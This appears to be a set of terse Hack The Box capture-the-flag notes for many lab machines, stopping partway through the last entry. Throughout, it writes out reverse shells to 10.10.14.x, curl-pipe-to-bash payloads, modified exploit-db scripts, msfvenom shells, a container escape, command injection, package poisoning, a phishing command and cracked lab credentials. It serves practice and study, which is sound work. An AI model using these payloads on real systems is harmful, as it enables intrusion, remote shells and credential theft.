intercept with burp, edit 'avatar.png' into 'avatar.php'
found img URL by click on it: http://passage.htb/CuteNews/uploads/avatar.php
Privilege_escalation
google CuteNews database, and it does not use any but store it in /var/www/html/CuteNews/cdata/users
decrypt: base64 -d => awk => hashcat => 'paul:atlanta1' 'egre55:egre55'
ssh as paul with the cred, found his ssh key, his id_rsa.pub and authorized_keys end with 'nadav@passage'
ssh success as nadav using that key, '.viminfo' has contents about 'dbus-1' and 'polkit-1'
https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
`cp /etc/passwd /dev/shm/passwd` 'echo 'username:$1$username$je5/ATIGzeDQw:0:0:/root/root:/bin/bash' >> /dev/shm/passwd'
`gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /dev/shm/passwd /etc/passwd`
`su username` password is 'password'

Initial_Foothold
nmap shows dms-pit.htb
`snmpwalk -c public -v1 10.10.10.241 . > snmpwalk.v1.txt`
discover 'pit.htb' user:michelle and '/var/www/html/seeddms51x/seeddms'
login /seeddms51x/seeddms with michelle:michelle found 'update note' version 5.1.15
download and inspect 'CHANGELOG' 5.1.11:- fix for CVE-2019-12744 (Remote Command Execution through unvalidated file upload), add .htaccess file to data directory
`curl http://dms-pit.htb/seeddms51x/data/.htaccess` all conf for apache, but nmap tcp/80 show nginx/1.14.1
SeedDMS versions < 5.1.11 - Remote Command Execution https://www.exploit-db.com/exploits/47022
follow the steps in 47022.txt got RCE but reverse shell not work
`curl http://dms-pit.htb/seeddms51x/data/1048576/30/1.php --data-urlencode "cmd=cat /var/www/html/seeddms51x/conf/settings.xml"`
found db cred seeddms:ied^ieY6xoquu
Failed: ssh michelle:ied^ieY6xoquu need key
Success: michelle:ied^ieY6xoquu login tcp/9090 got a pretty web shell as michelle
Privilege_escalation
snmpwalk.v1.txt shows 'NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor'
`find . -name monitor -ls 2>/dev/null` `cat /usr/bin/monitor` which is running /usr/local/monitoring/check*sh
`ls -ld /usr/local/monitoring` drwxrwx---+ 2 root root 122 May 14 14:40 /usr/local/monitoring
'+' means there’s additional ACLs set on the directory
`getfacl /usr/local/monitoring` user:michelle:-wx
create payload(echo our key to root/.ssh/authorized_keys) as /usr/local/monitoring/check_test.sh and run snmpwalk again
ssh as root with the key and dig SeLinux in 0xdf's walkthrough[Beyond Root - SeLinux]

Initial_Foothold as charix
http://10.10.10.84/browse.php?file=listfiles.php found pwdbackup.txt and phpinfo.php
`|base64 -d` copy and paste(13 times) after `cat pwdbackup.txt` got Charix!2#4%6&8(0
OR `data=$(cat pwd.b64); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data`
guess username 'charix' from the pass OR `view-source:http://10.10.10.84/browse.php?file=%2Fetc%2Fpasswd`
ssh charix:Charix!2#4%6&8(0
Initial_Foothold as www
Web Shell Via Log Poisoning
http://10.10.10.84/browse.php?file=notexist shows error and path: /usr/local/www/apache24/data/browse.php
http://10.10.10.84/browse.php?file=/usr/local/etc/apache24/httpd.conf found /var/log/httpd-error.log
use burp edit User-Agent: test:
http://10.10.10.84/browse.php?file=/var/log/httpd-error.log&cmd=id
got a shell as www, let's SSH as Charix
Privilege_escalation
found secret.zip in user home, unzip with pass of 'secret' got secret
`file secret` secret: Non-ISO extended-ASCII text, with no line terminators
`pw -auxww` found root running vnc on localhost:5901 and check walkthrough 'secret' is a vnc key
Note: If anyone can identify the 'secret' file as a vnc key, please let me know
setup proxy `ssh charix@10.10.10.84 -D 9050` `tail /etc/proxychains.conf` socks4 127.0.0.1 9050
`proxychains vncviewer 127.0.0.1:5901 -passwd secret`

Initial_Foothold
gobuster dir found /test /index /torrent /rename
/test is phpinfo page which have 'file_uploads ON'
/torrent register and login, found admin:admin12 in /torrent/readme/readme.html
upload oneliner cmd.gif.php using burp
need to add image magic bytes before php code in cmd.gif.php
need to edit 'Content-Type' in burp to 'image/gif'(my way) OR 'multipart/form-data'(0xdf way)
`curl http://10.10.10.6/torrent/upload/ae19bcf0996a1fc5c2768850eab332df22c18416.php -d "cmd=id"`
Privilege_escalation 1
linpeas.sh found [CVE-2010-0832] PAM MOTD
https://www.exploit-db.com/download/14339
Privilege_escalation 2
Dirty Cow

Initial_Foothold
nmap found 6379/tcp open redis Redis key-value store 4.0.9
https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis
`ssh-keygen -t rsa` `(echo -e "\n\n"; cat rsakey.pub; echo -e "\n\n") > spaced_key.txt`
`cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set ssh_key`
`redis-cli -h 10.10.10.160` `config set dir /var/lib/redis/.ssh` `config set dbfilename "authorized_keys"` `save`
`ssh -i rsakey redis@10.10.10.160`
Privilege_escalation
linpeas.sh found /opt/id_rsa.bak
ssh2john and crack got password: computer2008
Failed: ssh as matt with the key and pass, due to /etc/ssh/sshd_config has 'DenyUsers Matt'
Success: `su matt` with password:computer2008
10000/tcp open http MiniServ 1.910 (Webmin httpd) login success with matt:computer2008
Webmin 1.984 - Remote Code Execution (Authenticated) https://www.exploit-db.com/exploits/50809
`nc -nvlp 9001` `python3 50809.py -t https://10.10.10.160:10000 -c Matt:computer2008 -L 10.10.14.26 -P 9001 -LS 10.10.14.26:8080`

Initial_Foothold
enum webpage with burp ON, found the 301 redirect response have content
edit response '302 Found' to '200 OK' and it looks logged in bypassing the login check
go to /accounts.php and edit 302 to 200 again and create an account
download SITEBACKUP.ZIP and unzip got sourcecode of web root files
file_logs.php have a injection point: $output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
burp edit POST to /file_logs.php delim=comma;bash -c 'bash -i >%26 /dev/tcp/10.10.14.6/443 0>%261' and got www-data shell
Privilege_escalation
found root:mySQL_p@ssw0rd!:) in /home/m4lwhere/config.php
`mysql -h localhost -u root -p'mySQL_p@ssw0rd!:)'`
`use previse;select * from accounts;` got m4lwhere's hash
hashcat crack 'ilovecody112235!' and `su m4lwhere`
(root) /opt/scripts/access_backup.sh
the script run 'gzip' without specify the full path
create payload file /dev/shm/gzip then `echo PATH=/dev/shm:$PATH` then run sudo script got root

Initial_Foothold
tcp/5080 gitlab register and login, found version 11.4.7 at /help
GitLab 11.4.7 - RCE (Authenticated) (2) https://www.exploit-db.com/exploits/49334
if using base64 encode like ippsec make sure no '+' in payload after encoded by adding space before encode
49334.py: lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port} -e /bin/bash' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
49334_fixed.py: lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'echo YmFzaCAtYyAnL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjI2LzkwMDEgMD4mMSc= | base64 -d | bash ' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
`python3 49334_fixed.py -u username -p password -g http://10.10.10.220 -l 10.10.14.26 -P 9001`
There is a fixed one on github https://github.com/ctrlsam/GitLab-11.4.7-RCE
OR just follow 0xdf do it manually in New_project>Import_project>Repo_by_URL>Project_URL:
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/.git
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|curl http://10.10.14.8/shell.sh|bash\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
the manual payload is from https://hackerone.com/reports/299473
Privilege_escalation(container_git->container_root)
linpeas.sh found /opt/backup/gitlab.rb:gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
`su root`
Privilege_escalation(container_root->root)
/opt/backup/docker-compose.yml has 'privileged: true'
cgroups Escape method
https://0xdf.gitlab.io/2021/05/17/digging-into-cgroups.html
root@gitlab:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@gitlab:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@gitlab:~# t=`sed -n 's/.*\perdir=$[^,]*$.*/\1/p' /etc/mtab`
root@gitlab:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.8/shell.sh | bash' >/c;
root@gitlab:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";
File System Escape method
`lsblk` |-sda2 8:2 0 18G 0 part /var/log/gitlab
`mount /dev/sda2 /mnt` `cat /mnt/root/root.txt`

Initial_Foothold
Metasploit Framework 6.0.11 - msfvenom APK template command injection https://www.exploit-db.com/exploits/49491
edit: payload = 'curl http://10.10.14.26/reverse-bash-i.sh|bash'
got shell as kid
Privilege_escalation
analize /home/pwn/scanlosers.sh
`echo '1 2 ;curl http://10.10.14.26/reverse-bash-i.sh|bash #' > /home/kid/logs/hackers`
got shell as pwn
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
msf6 > bash

Initial_Foothold
tcp/8080 gitbucket create an account and login
found cred tomcat:42MrHBf*z8{Z% in root>seal_market>tomcat>commits>"Updating tomcat configuration"
found hint 'remove mutual authentication for the dashboard' in root>seal_market>README.md
found web dir: /manager/html /admin/dashboard /host-manager/html in root>seal_market>nginx>sites-enabled>default
Mutual authentication, also known as two-way authentication, is a security process in which entities authenticate each other before actual communication occurs.
In a network environment, this requires that both the client and the server must provide digital certificates to prove their identities.
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
bypass Mutual authentication: https://seal.htb/manager;sth=test/html
login with tomcat:42MrHBf*z8{Z% got tomcat app manager and found .war deployer
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.26 LPORT=9001 -f war > shell.war`
got shell as tomcat
Privilege_escalation
pspy found `python3 /usr/bin/ansible-playbook /opt/backups/playbook/run.yml` as UID=1000 which is luis
/opt/backups/playbook/run.yml has 'synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes'
according to https://docs.ansible.com/ansible/latest/collections/ansible/posix/synchronize_module.html#parameter-copy_links
the 'copy_links=yes' means 'Copy symlinks as the item that they point to (the referent) is copied, rather than the symlink.'
`ln -s /home/luis/.ssh/id_rsa /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/id_rsa`
`cp /opt/backups/archives/backup-2023-07-18-15:06:32.gz /dev/shm/key.gz ; gzip -dq /dev/shm/key.gz`
`ssh -i luis_key luis@10.10.10.250` `sudo -l` (ALL) NOPASSWD: /usr/bin/ansible-playbook *
https://gtfobins.github.io/gtfobins/ansible-playbook/
TF=$(mktemp); echo '[{hosts: localhost, tasks: [shell: /bin/sh /dev/tty 2>/dev/tty]}]' >$TF; sudo /usr/bin/ansible-playbook $TF

Initial_Foothold
gobuster dir https found /system-users.txt which shows username: Rohit password: company defaults
google phsense default cred got admin:phsense
login with Rohit:phsense found version 2.1.3
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection https://www.exploit-db.com/exploits/43560
`python3 43560.py --lhost 10.10.14.26 --lport 9001 --rhost 10.10.10.60 --username rohit --password pfsense`
listener got root

Initial_Foothold
gobuster vhost found exam.seventeen.htb
Exam Reviewer Management System 1.0 - ‘id’ SQL Injection https://www.exploit-db.com/exploits/50725
use burp intercept copy to file get.req and sqlmap found 31234:autodestruction
according to sqlmap dump 'date_uploaded: 2020-01-26' of Marksheet-finals.pdf and the hint inside 'new webmail service mastermailer.seventeen.htb'
the 'mastermailer.seventeen.htb' is running roundcube, google search roundcube with '2020' OR /mastermailer/CHANGELOG found version 1.4.2
CVE-2020-12640 https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2020-12640-PHP%20Local%20File%20Inclusion-Roundcube
`feroxbuster -u http://oldmanagement.seventeen.htb:8000/oldmanagement/files/31234/` found /papers upload papers.php (php-reverse-shell)
_plugins_qwerty=../../../../../../../../../var/www/html/oldmanagement/files/31234/papers&_step=2&_product_name=Seventeen+Webmail&submit=UPDATE+CONFIG
config file saved, we can get a www-data shell when we hit any roundcube page
OR simply overwrite the .htaccess file by upload an empty .htaccess file which will enable the php code excution /oldmanagement/files/31234/shell.php
Privilege_escalation(container_www-data->mark)
linpeas.sh found employeemanagementsystem/process/dbh.php:$dbPassword = "2020bestyearofmylife";
ssh mark:2020bestyearofmylife
Privilege_escalation(mark->kavi)
found cred root:IhateMathematics123# in /dev/shm/node_modules/db-logger/logger.js
ssh or su kavi:IhateMathematics123#
Privilege_escalation(kavi->root)
kavi `sudo -l` (ALL) /opt/app/startup.sh
sudo script has '/usr/bin/npm install $dep --silent'
Failed: `npm login` 'user registration disabled' which means we can't poison registry
due to 'ubuntu 18.04' the script running as root but preserve $HOME, which we can edit /home/kavi/.npmrc to point to our kali
`cp /bin/bash /home/kavi/bash; mkdir test;cd test;echo 'registry=http://10.10.14.26:4873/' > ~/.npmrc` (moving to ./test is because '$dep' is not installed there, else it would not pull the registry)
kali# docker pull verdaccio/verdaccio ('verdaccio' can be found `curl localhost:4873` on target)
kali# docker run -it --rm --name verdaccio -p 4873:4873 -e 'VERDACCIO_PUBLIC_URL=http://10.10.14.26:4873' verdaccio/verdaccio
kali# npm adduser --registry http://localhost:4873 (To create a .npmrc file with authtoken)
`npm install loglevel` found target's loglevel is at 1.8.0 which means we need at least 1.8.1
kali# mkdir test;cd test;npm init;mousepad index.js
ADD: require("child_process").exec("chown root:root /home/kavi/bash; chmod 4755 /home/kavi/bash")
kali# npm publish --registry http://10.10.14.26:4873
`sudo /opt/app/startup.sh`

Initial_Foothold
nmap '623/udp open asf-rmcp' which has 'ipmi-rmcp'
webpage also mention 'Bare Metal BMC automation' which leads to IPMI after google it https://deploy.equinix.com/blog/redfish-and-the-future-of-bare-metal-server-automation/
use msf or ipmiPwner to get hash and crack got cred: Administrator:ilovepumkinpie1
msf auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_dumphashes
ipmiPwner https://github.com/c0rnf13ld/ipmiPwner
gobuster vhost found monitor.shibboleth.htb monitoring.shibboleth.htb zabbix.shibboleth.htb
login monitor.shibboleth.htb found zabbix version 5
Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated) https://www.exploit-db.com/exploits/50816
OR manually 'Create item' in 'host' and put payload in 'Key' as system.run[echo ... | base64 -d | bash] and hit 'test'
Privilege_escalation(zabbix->ipmi-svc)
`su ipmi-svc` with ilovepumkinpie1
Privilege_escalation(ipmi-svc->root)
found zabbix:bloooarskybluh in /etc/zabbix/zabbix_server.conf
`mysql -u zabbix -pbloooarskybluh` 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
CVE-2021-27928 https://github.com/Al1ex/CVE-2021-27928
kali# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.26 LPORT=9001 -f elf-so -o CVE-2021-27928.so
MariaDB [(none)]> SET GLOBAL wsrep_provider="/dev/shm/CVE-2021-27928.so";
and listener got root

Initial_Foothold
based on burp respond headers and machine name, we can think of the famous ShellShock attack
gobuster dir found /cgi-bin/user.sh
`nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56` which confirm shellshock
ShellShock, AKA Bashdoor or CVE-2014-6271 https://en.wikipedia.org/wiki/Shellshock_(software_bug)
`curl -vvv http://10.10.10.56/cgi-bin/user.sh -A "() { :;}; echo; /usr/bin/id"`
Privilege_escalation(shelly->root)
`sudo -l` (root) NOPASSWD: /usr/bin/perl
https://gtfobins.github.io/gtfobins/perl/
`sudo /usr/bin/perl -e 'exec "/bin/sh";'`

Initial_Foothold
note all emails on /team.php
root@kali# swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197
`nc -nvlp 80` received cred paulbyrd@sneakymailer.htb:^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
login Evolution(email app) and found cred developer:m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
ftp login `put cmd.php` and trigger with `curl http://dev.sneakycorp.htb/cmd.php --data-urlencode "cmd=PAYLOAD"`
Privilege_escalation(www-data->low)
`ps -ef` found 'pypi-server' has an arg call '-P /var/www/pypi.sneakycorp.htb/.htpasswd'
decrypte /var/www/pypi.sneakycorp.htb/.htpasswd hash got cred pypi:soufianeelhaoui
/etc/nginx/sites-enabled/pypi.sneakycorp.htb show it's on pypi.sneakycorp.htb:8080
webpage is about pypiserver 1.3.2 and `ps -ef` found user 'low' running '/home/low/venv/bin/python /opt/scripts/low/install-modules.py'
create package payload structure: ./.pypirc ./setup.py and ./[package name]/__init__.py
suggested payloads: ippsec's(write ssh key),0xdf's(reverse_shell), OR https://github.com/mschwager/0wned
root@kali# python3 setup.py sdist upload -r remote (-r means repo name)
Privilege_escalation(low->root)
`sudo -l` (root) NOPASSWD: /usr/bin/pip3
https://gtfobins.github.io/gtfobins/pip/
TF=$(mktemp -d); echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py; sudo pip3 install $TF

Initial_Foothold
`nc 10.10.10.51 4555` login JAMES Remote Admin 2.3.2 with root:root
`HELP` `listusers` and reset all pass using `setpassword *username* password`
`telnet 10.10.10.51 110` login with `USER *username*` `PASS password` `LIST` `RETR *num*` found mindy:P@55W0rd1!2@
rbash escape with `ssh mindy@10.10.10.51 -t bash` OR -t "sh"
Privilege_escalation
pspy found root running /bin/sh -c python /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py
gain full TTY and vi edit /opt/tmp.py with python payload

Initial_Foothold
`./finger-user-enum.pl -t 10.10.10.76 -U /usr/share/seclists/Usernames/Names/names.txt`
found username sunny and sammy have logged on
`ssh sunny@10.10.10.76 -p 22022` with password: sunny
`sudo -l` (root) NOPASSWD: /root/troll
`ls -al /root/troll` /root/troll: Permission denied
found sammy hash in /backup/shadow.backup and crack got sammy:cooldude!
`su sammy`
Privilege_escalation(sammy->root)
`sudo -l` (root) NOPASSWD: /usr/bin/wget
https://gtfobins.github.io/gtfobins/wget/
OR use '-O' to force overwrite /etc/passwd or /etc/sudoers

Initial_Foothold
webpage icon 'Magento' `./magescan.phar scan:all swagshop.htb` found version 1.9.0.1 (but gobuster /RELEASE_NOTES.txt shows 1.7.0.2)
found cred pdo_mysql:root:fMVWh7bDHpgZkyfqQXreTjU9:db=swagshop in /app/etc/local.xml for later use
use 37977.py or the poc.py from github to add a admin account for /index.php/admin
Magento eCommerce - Remote Code Execution https://www.exploit-db.com/exploits/37977
https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution https://www.exploit-db.com/exploits/37811
need to edit creds and 'install_date' according to `curl -s 10.10.10.140/app/etc/local.xml | grep date` (also need python mechanize)
`python magento_rce.py 'http://10.10.10.140/index.php/admin' "uname -a"`
Another way that has patched(not verified) is https://github.com/lavalamp-/LavaMagentoBD
It's uploading a Magento package in /downloader to gain a webshell
Privilege_escalation(www-data->root)
`sudo -l` (root) NOPASSWD: /usr/bin/vi /var/www/html/*
https://gtfobins.github.io/gtfobins/vi/
`sudo /usr/bin/vi /var/www/html/test`
:set shell=/bin/sh
:shell
OR `sudo /usr/bin/vi /var/www/html/a -c ':!/bin/sh'`

Initial_Foothold
found /news.php?file= LFI(Local File Inclusion)
found cred tomcat:$3cureP4s5w0rd123! "http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml"
login 8080/host-manager/html with the cred and found nothing useful
based on https://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html#Supported_Manager_Commands
`msfvenom -p java/shell_reverse_tcp lhost=10.10.14.26 lport=9001 -f war -o test.war`
`curl -u 'tomcat:$3cureP4s5w0rd123!' "http://10.10.10.194:8080/manager/text/deploy?path=/test" --upload-file test.war`
and set listener and trigger with `curl http://10.10.10.194:8080/test`
Privilege_escalation(tomcat->ash)
/var/www/html/files/16162020_backup.zip zip2john and crack got password 'admin@it'
`su ash` with the password works
Privilege_escalation(ash->root)
ash has GID 116(lxd)
normal alpine container: https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
m0noc's 656 bytes container: echo QlpoOTFBWSZTWaxzK54ABPR/p86QAEBoA//QAA3voP/v3+AACAAEgACQAIAIQAK8KAKCGURPUPJGRp6gNAAAAGgeoA5gE0wCZDAAEwTAAADmATTAJkMAATBMAAAEiIIEp5CepmQmSNNqeoafqZTxQ00HtU9EC9/dr7/586W+tl+zW5or5/vSkzToXUxptsDiZIE17U20gexCSAp1Z9b9+MnY7TS1KUmZjspN0MQ23dsPcIFWwEtQMbTa3JGLHE0olggWQgXSgTSQoSEHl4PZ7N0+FtnTigWSAWkA+WPkw40ggZVvYfaxI3IgBhip9pfFZV5Lm4lCBExydrO+DGwFGsZbYRdsmZxwDUTdlla0y27s5Euzp+Ec4hAt+2AQL58OHZEcPFHieKvHnfyU/EEC07m9ka56FyQh/LsrzVNsIkYLvayQzNAnigX0venhCMc9XRpFEVYJ0wRpKrjabiC9ZAiXaHObAY6oBiFdpBlggUJVMLNKLRQpDoGDIwfle01yQqWxwrKE5aMWOglhlUQQUit6VogV2cD01i0xysiYbzerOUWyrpCAvE41pCFYVoRPj/B28wSZUy/TaUHYx9GkfEYg9mcAilQ+nPCBfgZ5fl3GuPmfUOB3sbFm6/bRA0nXChku7aaN+AueYzqhKOKiBPjLlAAvxBAjAmSJWD5AqhLv/fWja66s7omu/ZTHcC24QJ83NrM67KACLACNUcnJjTTHCCDUIUJtOtN+7rQL+kCm4+U9Wj19YXFhxaXVt6Ph1ALRKOV9Xb7Sm68oF7nhyvegWjELKFH3XiWstVNGgTQTWoCjDnpXh9+/JXxIg4i8mvNobXGIXbmrGeOvXE8pou6wdqSD/F3JFOFCQrHMrng= | base64 -d > bob.tar.bz2
`lxd init` (accept all default)
`lxc image import bob.tar.bz2 --alias bobImage`
`lxc init bobImage bobVM -c security.privileged=true`
`lxc config device add bobVM realRoot disk source=/ path=r`
`lxc start bobVM`
`lxc exec bobVM -- /bin/sh`

Initial_Foothold
tcp/8080 jamovi 'Rj Editor' code excution: system("id",intern = TRUE)
Privilege_escalation(jamovi_container-root->bolt_container-www-data)
unzip bolt-administration.omv and found cred matt@talkative.htb:jeO09ufhWD<s janit@talkative.htb:bZ89h}V<S_DA saul@talkative.htb:)SQWGm>9KHEA in xdata.json
/bolt/login with admin:jeO09ufhWD<s
SSTI(Server Side Templet Injection) themes/index.twig add: {{['bash -c "PAYLOAD"']|filter('system')}}
Maintenance>Clear_the_cache and refresh main page got code excution
Privilege_escalation(bolt_container-www-data->saul)
`cat /proc/net/fib_trie` found IP 172.17.0.14
`ssh saul@172.17.0.1` )SQWGm>9KHEA
Privilege_escalation(saul->Rock_Chat_container-root)
docker analysis `ps auxww | grep docker` upload nmap and scan local found 27017
`./chisel_1.7.7_linux_amd64 server -p 8000 --reverse`
upload to target and `./chisel_1.7.7_linux_amd64 client 10.10.14.6:8000 R:27017:172.17.0.2:27017`
`apt install mongodb-clients` and `mongo` which will connect to the localhost:27017
`show databases` found non-default db:meteor `use meteor` `db.getCollectionNames()` `db.users.find()`
and update our rocket_chat user to admin role: `db.users.update({"_id": "4T6XJCNEWz3xqN8LK"}, { $set: { "roles" : ["admin"]}})`
tcp/3000 rocket_chat>Integrations>New_Integration>web_hooks:
An Incoming WebHook will listening for HTTP requests and post some messages based on the content of the request.
An Outgoing WebHook will process chat messages in Rocket Chat and send HTTP data when certain criteria are met.
create Incoming_WebHook(Post_to_Channel #general, Post_as *our_rocket_chat_user*, and the Script with payload)
payload using https://www.revshells.com/ “node.js#2” also need: const require = console.log.constructor('return process.mainModule.require')();
save webhook got its URL,set listener and curl the URL
Privilege_escalation(Rock_Chat_container-root->ROOT)
https://github.com/stealthcopter/deepce scan container found 'dac_read_search' mark as red
https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3
http://stealth.openwall.net/xSports/shocker.c
edit the shocker.c to read root.txt instead of /etc/shadow
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities#cap_dac_override
Even scan result shows there is no 'cap_dac_override' and `capsh --print` also show that, the overwrite script works
by the way. `capsh --print` need to install libcap and libcap2-bin https://command-not-found.com/capsh
And overwrite /etc/passwd to get a root shell

Initial_Foothold
gobuster found /webservices/wp scan with `wpscan -u http://10.10.10.88/webservices/wp/ --enumerate p,t,u`
wpscan shows 'gwolle-gb Version: 2.3.10' but 'http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt' shows a hint: '* Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D'
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion https://www.exploit-db.com/exploits/38861
serving the php-reverse-shell.php as wp-load.php and `curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.26/`
Privilege_escalation(www-data->onuma)
`sudo -l` (onuma) NOPASSWD: /bin/tar
https://gtfobins.github.io/gtfobins/tar/
`sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash`
Privilege_escalation(onuma->root)
pspy found root is running '/bin/bash /usr/sbin/backuperer'
`watch -n 1 'systemctl list-timers'`
ippsec video: In the 'sleep 30' time window, overwrite(cp) the /var/tmp/*random*.gz with our own(which contains a SUID file own by root created from kali(chmod 6555)) and wait for the 'tar extract' to preserve the root permission on the SUID file.
0xdf's read root.txt oneliner: cd /dev/shm; start=$(find /var/tmp -maxdepth 1 -type f -name ".*"); cur=$(find /var/tmp -maxdepth 1 -type f -name ".*"); while [ "$start" == "$cur" -o "$cur" == "" ] ; do sleep 10; cur=$(find /var/tmp -maxdepth 1 -type f -name ".*"); done; echo "File changed... copying here"; cp $cur .; fn=$(echo $cur | cut -d'/' -f4); tar -zxf $fn; rm var/www/html/robots.txt; ln -s /root/root.txt var/www/html/robots.txt; rm $fn; tar czf $fn var; mv $fn $cur; rm $fn; rm -rf var

Initial_Foothold
put random text in the 'JSON validator' and google the error msg
https://blog.doyensec.com/2019/07/22/jackson-gadgets.html
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -c "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"')
Privilege_escalation(pericles->root)
pspy found root is running '/bin/bash /usr/bin/timer_backup.sh'
and it's writable -rwxrw-rw- 1 pericles pericles 88 Jul 28 01:05 /usr/bin/timer_backup.sh
echo payload to it and wait for root to run it
`echo -e '\nbash -i >& /dev/tcp/10.10.14.8/443 0>&1' >> /usr/bin/timer_backup.sh`

Initial_Foothold
nmap found 'nostromo 1.9.6'
nostromo 1.9.6 - Remote Code Execution https://www.exploit-db.com/exploits/47837
`python 47837.py 10.10.10.165 80 "bash -c 'bash -i >& /dev/tcp/10.10.14.26/9001 0>&1'"`
Privilege_escalation(www-data->david)
linpeas.sh found david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/ in /var/nostromo/conf/.htpasswd
cracked david:Nowonly4me does not work for `su david`
found -rw-r--r-- 1 david david 1915 Oct 25 2019 /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
`curl 10.10.10.165/~david/protected-file-area/backup-ssh-identity-files.tgz` got 401 Unauthorized
`wget http://david:Nowonly4me@10.10.10.165/~david/protected-file-area/backup-ssh-identity-files.tgz`
OR just cp to /dev/shm and use nc to transfer
`tar -zxvf backup-ssh-identity-files.tgz` got a encrypted id_rsa
`ssh2john home/david/.ssh/id_rsa > david-key-hash`
`john david-key-hash --wordlist=/usr/share/wordlists/rockyou.txt` password: hunter
`ssh -i home/david/.ssh/id_rsa david@10.10.10.165`
Privilege_escalation(david->root)
Failed: `sudo -l` need david's password
found -rwx------ 1 david david 363 Oct 25 2019 /home/david/bin/server-stats.sh
which has a line `/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat`
`/usr/bin/journalctl --help` -n --lines[=INTEGER] Number of journal entries to show
https://gtfobins.github.io/gtfobins/journalctl/#sudo `sudo journalctl` and `!/bin/sh`
we can drag the terminal height till it's less than 5 lines, which will cause 'journalctl' output into 'less' mode, so that we can inject '!/bin/sh' and get root

Initial_Foothold
gobuster dir found /dev `curl http://10.10.10.79/dev/hype_key > hype_key`
cyberchef From hex (delimiter: space) output is a RSA PRIVATE KEY
OR just `cat hype_key | xxd -r -p > hype_key`
Failed: creack with hashcat and rockyou.txt
tcp/443 webpage show heartbleed logo
